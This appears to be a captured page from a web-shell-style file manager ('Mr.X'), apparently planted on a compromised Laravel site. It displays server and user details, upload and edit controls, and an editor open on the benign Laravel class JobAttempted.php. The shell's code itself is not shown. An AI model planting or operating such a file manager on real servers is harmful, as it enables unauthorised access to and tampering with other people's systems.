🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:JobAttempted.php
<?php namespace Illuminate\Queue\Events; class JobAttempted { /** * Create a new event instance. * * @param string $connectionName The connection name. * @param \Illuminate\Contracts\Queue\Job $job The job instance. * @param \Throwable|null $exception The exception, if one occurred while processing the job. */ public function __construct( public $connectionName, public $job, public $exception = null, ) { } /** * Determine if the job completed with failing or an unhandled exception occurring. * * @return bool */ public function successful(): bool { return ! $this->job->hasFailed() && is_null($this->exception); } }
Save Changes
Cancel
Create New File
Create New Folder